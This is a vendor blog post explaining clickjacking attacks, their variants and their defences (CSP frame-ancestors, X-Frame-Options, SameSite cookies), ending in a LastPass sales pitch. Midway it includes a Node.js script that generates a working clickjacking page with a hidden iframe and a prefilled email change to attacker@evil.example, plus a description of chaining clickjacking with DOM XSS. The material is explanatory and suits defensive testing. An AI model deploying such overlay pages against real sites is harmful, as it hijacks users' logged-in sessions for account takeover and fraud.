$5,000 - $25,000. In June 2024, this is how much hackers on the Dark Web were willing to pay for the Chrome clickjacking vulnerability CVE-2024-5843.
The vulnerability affected Chrome versions up to 126.0.6478.53, concealing security-related notifications in the browser’s interface. With the security UI elements obscured, users were more likely to put their online safety at risk by entering sensitive data on unsecured portals.
Google has since patched the vulnerability, but is your business safe from all clickjacking exploits?
Read on to learn about the newest threats and your options for staying safe.
Understanding Clickjacking
Definition and meaning of clickjacking
First, what is the root cause of clickjacking?
The term “clickjacking” refers to the hijacking of user clicks for malicious purposes.
It’s a client-side cyberattack, where malicious actors trick users into performing unintended actions.
Client-side attacks target end-user devices such as mobile phones, laptops, and desktops.
The attacker uses a social engineering technique like phishing or smishing to lure the user to a web page they control, for example one promising a “prize” the user supposedly won. This decoy page contains seemingly legitimate user elements like buttons, icons, and links.
Once there, the user clicks on the “Claim Now” button, unaware that the click is delivered to something else entirely.
That something else is a legitimate target site (a shop, a bank, a social network) loaded in a transparent iframe placed on top of the decoy page and positioned so that the target’s real button sits exactly under the decoy button. The user is usually still logged in to the target, so whatever the click does there (a purchase, a settings change, a “Like”) happens under their own account.
Ultimately, then, the root cause of clickjacking is technical: the target page lets itself be displayed inside a frame on another origin, and the browser delivers the click to whichever element is on top, visible or not. The attacker’s desire for financial, social, or political gain is what turns that into an attack, achieved through manipulation of the web page’s visual display.
How clickjacking attacks work
Do you enjoy shopping on Amazon? If so, you aren’t alone: the platform is one of the three most-visited ecommerce sites in the world (the other two being AliExpress and eBay).
Amazon accounts for almost 40% of e-commerce sales in the United States. For many users, staying logged in with 1-Click ordering enabled is a convenient option.
But it’s also a dangerous one.
Imagine it’s Friday evening, and one of your family members is on Facebook, uploading pictures from a recent vacation. Suddenly, they see a pop-up ad for a hugely discounted plane ticket to Oahu, Hawaii’s third-largest island. Curious, they click on the ad.
Unbeknownst to them, the “Claim Your 75% Off Plane Ticket” button is positioned over an invisible “Buy Now” button for a waterproof GoPro camera on Amazon.
Once the ad button is clicked, the click lands on Amazon’s “Buy Now” button instead, and 1-Click ordering completes the purchase under the logged-in account.
Your bank then charges $399.99 to your credit card, which you’ll now have to dispute as a fraudulent transaction. Note that this only works against a page that allows itself to be loaded inside another site’s iframe; a shop that sends the anti-framing headers described under “Preventing Clickjacking” below can’t be framed this way, which is exactly why those headers matter.
Examples of clickjacking attacks
So, what are examples of clickjacking?
Some of the most popular techniques include:
- Likejacking: This type of attack tricks users into clicking “Like” unknowingly on social media platforms like Facebook. In 2010, Facebook users were tricked into liking a page called 101 Hottest Women in the World.
- Cookiejacking: A clickjacking variant demonstrated against Internet Explorer in 2011. The user is tricked into a drag-and-drop action (wrapped in a game, for instance) that moves the contents of a browser cookie into an attacker-controlled part of the page, handing over the session cookie and, with it, the logged-in session.
- Mousejacking: Despite the name, this is not a web attack. It targets wireless mice and keyboards: an attacker within radio range uses an inexpensive transceiver dongle to send spoofed packets to the victim’s USB receiver, which accepts them as keystrokes.
Having injected keystrokes, the attacker can type commands on the PC, for example to download and execute malware. Check whether your wireless mouse and keyboard are on the list of devices affected by mousejack keystroke injection and install the vendor’s firmware fix where one exists.
- Cursorjacking: Here, the attacker manipulates the apparent position of your cursor, for instance by hiding the real cursor and drawing a fake one at an offset. So, when you click on what looks like a legitimate button or link, the real cursor clicks on a hidden link that downloads malware to your device or directs you to a malicious page.
Newer cursorjacking techniques may leverage JavaScript or advanced CSS properties to create more convincing visual deceptions.
- Media File Jacking: First reported in 2019, and not a UI overlay attack either. A malicious Android app with permission to access external storage modifies media files (images, voice notes, documents) in the interval between a messaging app saving them and displaying them in its user interface. WhatsApp and Telegram on Android were the apps shown to be affected.
- Gesturejacking: Move over clickjacking; we now have gesturejacking (also called cross-window forgery). Here, the attacker sets up a malicious OAuth app and a URL. When you head to this seemingly innocent URL, you’re told to “Press and hold Enter to continue.”
If you comply, the key press opens a small new window containing the real authorization page for that app, and because the window is opened in response to your key press, it isn’t stopped by the pop-up blocker. The key you are still holding repeats into the new window, where the “Authorize” button already has focus, so it is pressed for you. The attacker’s app now has whatever API access the requested OAuth scopes grant: your personal, financial, or business data, depending on the service.
Types of Clickjacking Attacks
UI redressing as a clickjacking technique
Clickjacking is also generally known as a UI redress attack.
As mentioned, this type of attack involves an invisible overlay on top of decoy elements like links and buttons. With clickjacking evolving into more advanced forms like gesturejacking (also known as cross-window forgery), prevention is key to your safety. This includes:
- Regularly updating your browser
- Remaining vigilant about unfamiliar prompts and URLs
- Installing anti-clickjacking extensions
Clickjacking with prefilled form input
Here, attackers take advantage of a target site whose forms can be prefilled from URL parameters, and they choose the values.
An example is loading such a page in an invisible iframe, with a change-of-details or payment form already filled in by the attacker, and positioning its real “Submit” button over a visible fake button that says, “Play video.”
Because you’re still logged in to the target site, the frame loads with your session.
Once you click “Play”, the prefilled form is submitted under your account: the e-mail address on the account changes, or an unauthorized payment goes out, and you’ll be the one held liable for it.
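As an added example (not code from the original article), the following Node.js script generates the attacker’s page for the overlay attack described in “How clickjacking attacks work” above and for the prefilled-form variant just described. Everything specific in it is assumed for illustration: the target URL https://bank.example/settings, the query parameter email, the decoy label, and the button coordinates, which in a real test you would measure in the browser’s developer tools on a page you are authorized to assess.

```javascript
// Added example (not from the original article). Builds the attacker's page for a
// clickjacking proof of concept: a visible decoy button with the target site loaded
// in a transparent iframe on top of it, shifted so the target's real button sits
// exactly where the decoy is drawn. URLs, parameter names and coordinates are assumed.

// Position of the real button inside the target page (assumed; measure it with
// the browser's developer tools) and where the decoy is drawn on the attacker's page.
const TARGET_BUTTON = { left: 640, top: 420, width: 120, height: 40 };
const DECOY_AT = { left: 200, top: 150 };

// Escape a string for use inside HTML text or a double-quoted attribute.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;");
}

// Build the URL to frame. `prefill` models the prefilled-form variant: the target's
// form takes its initial values from query parameters, so the attacker picks them.
function buildTargetUrl(baseUrl, prefill = {}) {
  const url = new URL(baseUrl);
  for (const [name, value] of Object.entries(prefill)) {
    url.searchParams.set(name, value);
  }
  return url.toString();
}

// Offset that places the target button's top-left corner at the decoy's position.
function frameOffset(target, decoy) {
  return { left: decoy.left - target.left, top: decoy.top - target.top };
}

// `opacity` 0 hides the frame (the attack); 0.5 is handy while aligning the overlay.
function buildClickjackPoc({ targetUrl, decoyLabel, prefill = {}, opacity = 0,
                             target = TARGET_BUTTON, decoy = DECOY_AT }) {
  const framed = buildTargetUrl(targetUrl, prefill);
  const off = frameOffset(target, decoy);
  // The iframe has the higher z-index, so the click lands in it, not on the decoy.
  return [
    "<!doctype html>",
    '<html><head><meta charset="utf-8"><title>Congratulations!</title>',
    "<style>",
    "  body { margin: 0; font-family: sans-serif; }",
    `  #decoy { position: absolute; left: ${decoy.left}px; top: ${decoy.top}px;`,
    `           width: ${target.width}px; height: ${target.height}px; z-index: 1; }`,
    `  #victim { position: absolute; left: ${off.left}px; top: ${off.top}px;`,
    `            width: 1280px; height: 900px; border: 0; opacity: ${opacity}; z-index: 2; }`,
    "</style></head><body>",
    `  <button id="decoy">${escapeHtml(decoyLabel)}</button>`,
    `  <iframe id="victim" src="${escapeHtml(framed)}"></iframe>`,
    "</body></html>",
  ].join("\n");
}

if (typeof require !== "undefined" && require.main === module) {
  // Usage: node poc.js > poc.html, then open poc.html in a browser.
  process.stdout.write(buildClickjackPoc({
    targetUrl: "https://bank.example/settings",          // assumed target page
    prefill: { email: "attacker@evil.example" },        // assumed parameter name
    decoyLabel: "Claim your 75% off plane ticket",
  }));
}
```

Set opacity to 0.5 while lining up the overlay, then back to 0. If the framed page sends one of the anti-framing headers discussed later, the iframe stays blank and the attack fails, which is the quickest way to confirm a fix. The same prefill mechanism carries the script payload in the DOM XSS combination described next.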
Combining clickjacking with a DOM XSS attack
A dangerous attack combines clickjacking with a DOM Cross-Site Scripting (XSS) vulnerability on the target site.
A DOM XSS vulnerability exists when the page’s own JavaScript takes data from the URL or a form field and writes it into the Document Object Model (DOM) without sanitizing it, so attacker-supplied script ends up executing in the page. On its own, such a flaw may need a user action (submitting a form) to fire; clickjacking supplies that action.
For example, you see an email in your inbox warning about a (fake) breach at a service you use and telling you to reset your password. The link leads to the attacker’s page, where a visible “Reset” button is overlaid by an invisible iframe.
Inside that iframe is a real page of the target site whose form reflects one of its fields into the DOM on submit; the attacker has prefilled that field through the URL with a script payload. Your click on “Reset” submits the form, the payload runs in the target site’s origin inside your logged-in session, and from there it can read your account data or change your password on the attacker’s behalf.
Implications of Clickjacking
Potential risks to user privacy and security
Clickjacking comes with three main risks:
- Identity theft: This is the biggest risk of clickjacking. Identity theft shows no signs of waning – there's a victim every 22 seconds, and cases have tripled over the last decade.
- Financial losses: During a clickjacking attack, the hacker can trick you into making fraudulent transactions or authorizing transfers that drain your accounts.
- Privacy violations: One of the most frightening risks of clickjacking is the hijacking of webcams and microphones. In 2019, attackers could lure Mac users to a malicious site with embedded iframes. There, the users were tricked into launching Zoom meetings, giving the attackers immediate access to their webcams. Fortunately, the vulnerability (tracked as CVE-2019-13450) has since been patched.
Effects on online payment systems and social media platforms
As can be seen, attackers can leverage clickjacking attacks to redirect payments and steal banking details.
Meanwhile, social media platforms are favorite targets for likejacking, where attackers trick users into liking scam accounts or following accounts they never intended to support.
For example, you click on a button to watch a funny video or claim a coupon. However, the attacker overlays a hidden “Like” button over the video or coupon. Your click ends up endorsing misinformation about a food supplement, political figure, or religious issue.
Consequences of falling victim to clickjacking
Attackers can combine clickjacking with phishing to perform actions that negatively impact your business.
For example, your employee receives a phishing email that directs them to an attacker’s page, supposedly to update their password.
What your employee sees is a seemingly legitimate form for their employee portal.
Unbeknownst to them, the real employee portal is loaded in an invisible iframe positioned precisely over the visible (fake) page, with one of its account-settings forms (a new recovery e-mail address, say) already filled in by the attacker. The employee is still logged in to the portal, so their click on the visible “Update” button submits that form for real.
Without knowing it, your employee has handed the attacker a way into their account, and with it your organization’s employee, trade, and financial data.
At this point, many people ask, “Is clickjacking a serious vulnerability today?”
It’s important to note that modern browsers ship the defenses, but a site only benefits if it opts in by sending the right headers, and many pages still don’t; meanwhile, variants like gesturejacking keep appearing. To protect your business, keep all software patched, implement client- and server-side protections, and use a password manager that only autofills on the verified domain and stores credentials encrypted.
Read on to find out how you can do this.
Preventing Clickjacking: Clickjacking Defense Techniques
Using the frame-ancestors directive in a Content Security Policy (CSP)
So, what is the solution for clickjacking?
According to OWASP, there are both client-side and server-side defenses.
Client-side defenses include browser extensions like NoScript (for Mozilla Firefox), which blocks JavaScript and plugin content unless you explicitly allow it, and whose ClearClick feature warns you when a click would land on a hidden framed element.
Meanwhile, software solutions like GuardedID secure browser interactions so your keystrokes aren’t intercepted. GuardedID’s NoClickjack browser extension protects you on these browsers: Microsoft Edge, Mozilla Firefox, Safari, and Google Chrome.
Server-side defenses are HTTP response headers: the frame-ancestors directive in a Content Security Policy, and the older X-Frame-Options header. JavaScript “frame busting” scripts that try to break the page out of a frame predate these headers and can be defeated (for example, by loading the page in a sandboxed iframe that forbids top-level navigation), so they should not be relied on alone.
First, we’ll discuss a Content Security Policy (CSP), a Web standard that lets a site tell the browser which sources its page may load content from and, with the frame-ancestors directive, which sites may embed it. It’s effective against client-side attacks like XSS and clickjacking.
CSP originated at Mozilla and is standardized by the World Wide Web Consortium (W3C), the international organization responsible for the technical standards and guidelines that ensure the Web’s continued viability.
CSP Level 2, which introduced frame-ancestors, has been a finalized W3C Recommendation since 2016 and is implemented in all modern browsers. CSP Level 3, which adds further directives, is still a Working Draft as of 2024.
A CSP is generally implemented using an HTTP response header. The header contains one or more directives – these are rules or security instructions defining the types of content a browser can load and the trusted sources from which they can be loaded.
For example, the frame-ancestors directive is the one that matters for clickjacking: it lists the origins allowed to display your page inside an iframe, frame, object, or embed, and the browser refuses to render the page for any other embedder.
An example of a CSP with a frame-ancestors directive is frame-ancestors 'self'. Here, only pages from the site’s own origin ('self') can load the page in an iframe; to allow a trusted partner too, add its origin to the list, as in frame-ancestors 'self' https://partner.example.com. The directive syntax is the same as for the other CSP directives, for instance:
script-src 'self' js.example.com
- script-src governs where JavaScript may be loaded from.
- 'self' means the same origin as the current page: same scheme, host, and port. So, if your page is at https://example.com, scripts from https://example.com are allowed.
- js.example.com adds one extra host from which scripts may be loaded.
Meanwhile, frame-ancestors 'none' forbids framing the page anywhere, even on your own site. Either way, frame-ancestors only works when the CSP is sent as an HTTP response header; browsers ignore it in a <meta http-equiv> tag.
Utilizing X-Frame-Options Response Headers
The X-Frame-Options HTTP response header is the older mechanism; it tells the browser whether the page may be displayed inside a frame at all.
X-Frame-Options (superseded by the frame-ancestors directive) takes one of three values:
DENY: The page can’t be displayed in a frame, no matter where the embedding page comes from.
SAMEORIGIN: The page can be displayed in a frame, but only when the embedding page has the same origin (scheme, host, and port).
ALLOW-FROM uri: The page can be displayed in a frame only by the one listed origin. Only older versions of Internet Explorer and Firefox ever honoured this value; Chrome and Safari never did, and current browsers ignore it, which leaves the page frameable, so don’t use it.
Generally, X-Frame-Options is still worth sending in 2024, but cybersecurity professionals recommend the CSP header with the frame-ancestors directive for more robust, fine-grained control: several allowed origins, wildcards, and one policy that also covers object and embed.
Send both headers from your web server (Apache, NGINX, or the application itself) on every response, including error pages and redirects. Browsers that understand frame-ancestors apply it and ignore X-Frame-Options whenever the CSP contains that directive; older browsers fall back on X-Frame-Options.
So, using both X-Frame-Options and CSP frame-ancestors provides a defense against clickjacking across a wide range of browsers. Verify that the headers are actually present with the browser’s developer tools or curl -I.
The Same-Origin Policy (SOP) is not something you add; it’s built into every browser and stops a script on one origin from reading or manipulating content from another. It’s the reason the attacker’s page can’t read what’s inside the framed iframe, but it does nothing to stop the framing itself or the click being routed into it, which is why the headers above are needed.
Enhancing Security with SameSite Cookies
SameSite is a cookie attribute that tells the browser whether to attach the cookie to requests that cross site boundaries. Set correctly on session cookies, it blunts both Cross-Site Request Forgery (CSRF) and clickjacking: if the session cookie isn’t sent when your page is loaded inside a frame on another site, the framed page renders logged out and the hijacked click has nothing to act on.
Proper configuration of SameSite cookies ensures sensitive cookies (such as session cookies) are sent in cross-site contexts only where you intend. The attribute takes one of three values:
Strict: The cookie is only sent in same-site requests. It won’t be sent if you click a link from another site, and it won’t be sent when your page is loaded in another site’s iframe. For example, you’re logged into GitHub and click a link to a private GitHub project from an external corporate discussion forum. With Strict, you won’t be able to see the project; you’ll have to log in again to gain access to it.
Lax: The cookie is sent when you arrive via a normal, top-level navigation from an external link using a safe method (the GET request in the GitHub scenario above). It is not sent on cross-site POST requests, nor when the page is loaded in an iframe, image, or script from another site. POST is excluded because that’s where state-changing actions live (transferring funds, completing purchases), prime targets for CSRF attacks. Chromium-based browsers treat a cookie with no SameSite attribute as Lax by default, but Firefox and Safari do not, so set it explicitly.
None: The cookie is sent in all requests, including cross-site frames. When using SameSite=None, the Secure attribute must also be included, so that the cookie is only sent over HTTPS connections; browsers reject a SameSite=None cookie that lacks Secure.
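As an added example (not code from the original article), the following Node.js script models the SameSite decision described above and applies it to the framed-shop scenario from “How clickjacking attacks work”. The sites evil.example, shop.example, github.example and forum.example are assumed, and siteOf is a simplified stand-in for the Public Suffix List lookup that browsers actually perform.

```javascript
// Added example (not from the original article). Models the SameSite rule a browser
// applies when deciding whether a cookie accompanies a request, then applies it to
// the framed-shop clickjacking scenario. Site names are assumed for illustration.

// Registrable domain ("site") of a URL. Browsers consult the Public Suffix List;
// keeping the last two labels is enough for the example hosts used here.
function siteOf(url) {
  const labels = new URL(url).hostname.split(".");
  return labels.slice(-2).join(".");
}

// A request is same-site only when the document that initiated it and every
// frame above that document belong to the destination's site.
function isSameSite(request) {
  const dest = siteOf(request.url);
  return request.initiatorChain.every((origin) => siteOf(origin) === dest);
}

const SAFE_METHODS = new Set(["GET", "HEAD", "OPTIONS", "TRACE"]);

// cookie:  { name, sameSite: "Strict" | "Lax" | "None", secure: boolean }
// request: { url, method, initiatorChain: [origins], topLevelNavigation: boolean }
// Returns true when the browser attaches the cookie to the request.
function cookieIsSent(cookie, request) {
  // SameSite=None without Secure is rejected when the cookie is set, so it never exists.
  if (cookie.sameSite === "None" && !cookie.secure) return false;
  if (cookie.secure && new URL(request.url).protocol !== "https:") return false;
  if (isSameSite(request)) return true;
  switch (cookie.sameSite) {
    case "Strict":
      return false;
    case "Lax":
      // Cross-site: only top-level navigations with a safe method, never frames or POSTs.
      return request.topLevelNavigation && SAFE_METHODS.has(request.method.toUpperCase());
    case "None":
      return true;
    default:
      // Chromium treats a cookie without SameSite as Lax; Firefox and Safari do not.
      // Be explicit rather than rely on either default.
      throw new Error(`unknown SameSite value: ${cookie.sameSite}`);
  }
}

// Is the shop page still logged in when the attacker's page loads it in an iframe?
function framedPageIsAuthenticated(sessionCookie, attackerOrigin, targetUrl) {
  return cookieIsSent(sessionCookie, {
    url: targetUrl,
    method: "GET",
    initiatorChain: [attackerOrigin],
    topLevelNavigation: false,
  });
}

// Constructed sample: the same session cookie with each of the three settings.
const SAMPLES = {
  lax:    { name: "session", sameSite: "Lax",    secure: true },
  strict: { name: "session", sameSite: "Strict", secure: true },
  none:   { name: "session", sameSite: "None",   secure: true },
};

if (typeof require !== "undefined" && require.main === module) {
  for (const cookie of Object.values(SAMPLES)) {
    const ok = framedPageIsAuthenticated(cookie, "https://evil.example", "https://shop.example/buy-now");
    console.log(`SameSite=${cookie.sameSite}: framed shop page is ${ok ? "logged in" : "logged out"}`);
  }
}
```

With Lax or Strict on the session cookie, the shop page inside the attacker’s iframe loads without a session, so the hijacked “Buy Now” click has nothing to charge. SameSite is a second layer, not a replacement for the anti-framing headers: the page itself is still rendered inside the attacker’s frame, and pages that work without a session (a “Like” button, for instance) are unaffected.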
Protecting Yourself from Clickjacking with LastPass
Auto filling for passwords
The ease and security of Autofill is yours to enjoy with a LastPass subscription.
With LastPass, attackers can’t leverage iframes to trick your employees into exposing sensitive credentials.
Here’s the powerful reason why: If the visible domain doesn’t match the correct URL, LastPass won’t autofill your credentials.
MFA integration
At LastPass, our groundbreaking adaptive MFA is your secure defense against clickjacking. Even if attackers somehow manage to access your primary login credentials, they’ll still need access to your chosen MFA authentication option to exfiltrate your data.
With LastPass, you get superior protection with your choice of biometric, device-based, contextual, or hardware key authentication.
Dark web monitoring
We think Dark Web Monitoring is so important we’ve given all LastPass users (even those on free plans) access to it. With Dark Web Monitoring, you’ll never go a day without the security of knowing you’re protected. If your credentials end up on the Dark Web, we send you an alert so you can instantly generate a new, secure password with our Password Generator.
Encrypted vault
With LastPass, your vault is protected with AES-256-GCM encryption.
This means every credential you or your employees enter in a LastPass vault is unreadable to hackers – and anyone at LastPass.
At LastPass, we never stop working to ensure your safety and security. Sign up for a free, no-obligation LastPass Business trial on us.